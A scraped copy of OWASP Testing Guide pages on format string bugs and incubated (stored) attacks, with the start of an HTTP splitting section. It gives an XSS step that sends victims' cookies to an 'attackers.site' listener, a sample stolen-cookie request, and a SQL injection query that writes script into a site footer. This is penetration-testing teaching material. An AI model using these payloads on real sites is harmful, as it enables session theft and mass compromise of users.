4.0

Recommendations

Info

150Web Application Penetration TestingThe functions that are primarily responsible for format string vulnerabilitiesare ones that treat format specifiers as optional. Thereforewhen manually reviewing code, emphasis can be given to functionssuch as:printffprintfsprintfsnprintfvfprintfvprintfvsprintfvsnprintfThere can be several formatting functions that are specific to thedevelopment platform. These should also be reviewed for absenceof format strings once their argument usage has been understood.Tools• ITS4: “A static code analysis tool for identifying format stringvulnerabilities using source code” - http://www.cigital.com/its4• An exploit string builder for format bugs - http://seclists.org/lists/pen-test/2001/Aug/0014.htmlReferencesWhitepapers• Format functions manual page -http://www.die.net/doc/linux/man/man3/fprintf.3.html• Tim Newsham: “A paper on format string attacks” -http://comsec.theclerk.com/CISSP/FormatString.pdf• Team Teso: “Exploiting Format String Vulnerabilities” -http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html• Analysis of format string bugs -http://julianor.tripod.com/format-bug-analysis.pdfTesting for Incubated Vulnerability(OTG-INPVAL-015)SummaryAlso often refered to as persistent attacks, incubated testing is acomplex testing method that needs more than one data validationvulnerability to work. Incubated vulnerabilities are typicallyused to conduct “watering hole” attacks against users of legitimateweb applications.Incubated vulnerabilities have the following characteristics:• The attack vector needs to be persisted in the first place, itneeds to be stored in the persistence layer, and this would onlyoccur if weak data validation was present or the data arrivedinto the system via another channel such as an admin consoleor directly via a backend batch process.• Secondly, once the attack vector was “recalled” the vectorwould need to be executed successfully. For example, anincubated XSS attack would require weak output validation sothe script would be delivered to the client in its executable form.Exploitation of some vulnerabilities, or even functional featuresof a web application, will allow an attacker to plant a piece of datathat will later be retrieved by an unsuspecting user or other componentof the system, exploiting some vulnerability there.In a penetration test, incubated attacks can be used to assessthe criticality of certain bugs, using the particular security issuefound to build a client-side based attack that usually will be usedto target a large number of victims at the same time (i.e. all usersbrowsing the site).This type of asynchronous attack covers a great spectrum of attackvectors, among them the following:• File upload components in a web application, allowing theattacker to upload corrupted media files (jpg images exploitingCVE-2004-0200, png images exploiting CVE-2004-0597,executable files, site pages with active component, etc.)• Cross-site scripting issues in public forums posts (see Testingfor Stored Cross_site scripting (OTG-INPVAL-002) for additionaldetails). An attacker could potentially store malicious scriptsor code in a repository in the backend of the web-application(e.g., a database) so that this script/code gets executed by oneof the users (end users, administrators, etc). The archetypicalincubated attack is exemplified by using a cross-site scriptingvulnerability in a user forum, bulletin board, or blog in order toinject some JavaScript code at the vulnerable page, and will beeventually rendered and executed at the site user’s browser-using the trust level of the original (vulnerable) site at the user’sbrowser.• SQL/XPATH Injection allowing the attacker to upload content to adatabase, which will be later retrieved as part of the active contentin a web page. For example, if the attacker can post arbitraryJavaScript in a bulletin board so that it gets executed by users, thenhe might take control of their browsers (e.g., XSS-proxy).• Misconfigured servers allowing installation of Java packages orsimilar web site components (i.e. Tomcat, or web hosting consolessuch as Plesk, CPanel, Helm, etc.)How to TestBlack Box testingFile Upload ExampleVerify the content type allowed to upload to the web application andthe resultant URL for the uploaded file. Upload a file that will exploita component in the local user workstation when viewed or downloadedby the user. Send your victim an email or other kind of alert inorder to lead him/her to browse the page. The expected result is theexploit will be triggered when the user browses the resultant pageor downloads and executes the file from the trusted site.XSS Example on a Bulletin Board[1] Introduce JavaScript code as the value for the vulnerable field,for instance:document.write(‘’)[2] Direct users to browse the vulnerable page or wait for the usersto browse it. Have a “listener” at attackers.site host listeningfor all incoming connections.[3] When users browse the vulnerable page, a request containing
151Web Application Penetration Testingtheir cookie (document.cookie is included as part of the requestedURL) will be sent to the attackers.site host, such as the following:- GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSION-ID=ROGUEIDVALUE;%20JSESSIONID=ADIFFERENTVALUE:-1;%20ExpirePage=https:/vulnerable.site/site/;TOKEN=28_Sep_2006_21:46:36_GMT HTTP/1.1[4] Use cookies obtained to impersonate users at the vulnerablesite.SQL Injection ExampleUsually, this set of examples leverages XSS attacks by exploitinga SQL-injection vulnerability. The first thing to test is whetherthe target site has a SQL injection vulnerability. This is describedin Section 4.2 Testing for SQL Injection. For each SQL-injectionvulnerability, there is an underlying set of constraints describingthe kind of queries that the attacker/pen-tester is allowed to do.The tester then has to match the XSS attacks he has devisedwith the entries that he is allowed to insert.[1] In a similar fashion as in the previous XSS example, use a webpage field vulnerable to SQL injection issues to change a value inthe database that would be used by the application as input to beshown at the site without proper filtering (this would be a combinationof an SQL injection and a XSS issue). For instance, let’ssuppose there is a footer table at the database with all footersfor the web site pages, including a notice field with the legal noticethat appears at the bottom of each web page. You could usethe following query to inject JavaScript code to the notice field atthe footer table in the database.SELECT field1, field2, field3FROM table_xWHERE field2 = ‘x’;UPDATE footerSET notice = ‘Copyright 1999-2030%20document.write(\’\’)’WHERE notice = ‘Copyright 1999-2030’;[2] Now, each user browsing the site will silently send his cookiesto the attackers.site (steps b.2 to b.4).Misconfigured ServerSome web servers present an administration interface that mayallow an attacker to upload active components of her choice tothe site. This could be the case with an Apache Tomcat serverthat doesn’t enforce strong credentials to access its Web ApplicationManager (or if the pen testers have been able to obtainvalid credentials for the administration module by other means).In this case, a WAR file can be uploaded and a new web applicationdeployed at the site, which will not only allow the pen testerto execute code of her choice locally at the server, but also toplant an application at the trusted site, which the site regular userscan then access (most probably with a higher degree of trustthan when accessing a different site).As should also be obvious, the ability to change web page contentsat the server, via any vulnerabilities that may be exploitableat the host which will give the attacker webroot write permissions,will also be useful towards planting such an incubatedattack on the web server pages (actually, this is a known infection-spreadmethod for some web server worms).Gray Box testingGray/white testing techniques will be the same as previouslydiscussed.• Examining input validation is key in mitigating against thisvulnerability. If other systems in the enterprise use the samepersistence layer they may have weak input validation and thedata may be persisited via a “back door”.• To combat the “back door” issue for client side attacks, outputvalidation must also be employed so tainted data shall beencoded prior to displaying to the client, and hence not execute.• See the Data Validation section of the Code review guide.Tools• XSS-proxy - http://sourceforge.net/projects/xss-proxy• Paros - http://www.parosproxy.org/index.shtml• Burp Suite - http://portswigger.net/burp/proxy.html• Metasploit - http://www.metasploit.com/ReferencesMost of the references from the Cross-site scripting section arevalid. As explained above, incubated attacks are executed whencombining exploits such as XSS or SQL-injection attacks.Advisories• CERT(R) Advisory CA-2000-02 Malicious HTML TagsEmbedded in Client Web Requests - http://www.cert.org/advisories/CA-2000-02.html• Blackboard Academic Suite 6.2.23 +/-: Persistent cross-sitescripting vulnerability - http://lists.grok.org.uk/pipermail/fulldisclosure/2006-July/048059.htmlWhitepapers• Web Application Security Consortium “Threat Classification,Cross-site scripting” - http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtmlTesting for HTTP Splitting/Smuggling(OTG-INPVAL-016)SummaryThis section illustrates examples of attacks that leverage specificfeatures of the HTTP protocol, either by exploiting weaknessesof the web application or peculiarities in the way differentagents interpret HTTP messages.This section will analyze two different attacks that target specificHTTP headers:• HTTP splitting• HTTP smuggling
Page 2:
2THE ICONS BELOW REPRESENT WHATOTHE
Page 5:
3Testing Guide Foreword - Table of
Page 8 and 9:
6Testing Guide Foreword - By Eoin K
Page 11 and 12:
9Testing Guide Introduction2The OWA
Page 13 and 14:
11Testing Guide Introductionvide en
Page 15:
13Testing Guide IntroductionTesting
Page 18 and 19:
16Testing Guide IntroductionA Note
Page 20 and 21:
18Testing Guide Introduction• All
Page 22 and 23:
20Testing Guide Introductionassessm
Page 24 and 25:
22Testing Guide IntroductionWhen ev
Page 26 and 27:
243TheOWASP Testing FrameworkThe OW
Page 28 and 29:
26The OWASP Testing FrameworkPhase
Page 30 and 31:
28Web Application Penetration Testi
Page 32 and 33:
Page 34 and 35:
Page 36 and 37:
Page 38 and 39:
Page 40 and 41:
Page 42 and 43:
Page 44 and 45:
Page 46 and 47:
Page 48 and 49:
Page 50 and 51:
Page 52 and 53:
Page 54 and 55:
Page 56 and 57:
Page 58 and 59:
Page 60 and 61:
Page 62 and 63:
Page 64 and 65:
Page 66 and 67:
Page 68 and 69:
Page 70 and 71:
Page 72 and 73:
Page 74 and 75:
Page 76 and 77:
Page 78 and 79:
Page 80 and 81:
Page 82 and 83:
Page 84 and 85:
Page 86 and 87:
Page 88 and 89:
Page 90 and 91:
Page 92 and 93:
Page 94 and 95:
Page 96 and 97:
Page 98 and 99:
Page 100 and 101:
Page 102 and 103: 100Web Application Penetration Test
Page 202 and 203:
200Web Application Penetration Test
Page 204 and 205:
Page 206 and 207:
Page 208 and 209:
Page 210 and 211:
Page 212 and 213:
2105 ReportingPerforming the techni
Page 214 and 215:
212ReportingTest IDLowest versionSe
Page 216 and 217:
214AppendixAppendixThis section is
Page 218 and 219:
216Appendixjsp/products/soatest.jsp
Page 220 and 221:
218Appendix• OWASP Security Blitz
Page 222 and 223:
220Integer Overflows (INT)Integer o
Page 224:
222encoding can be used.If the web
show all

4.0

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?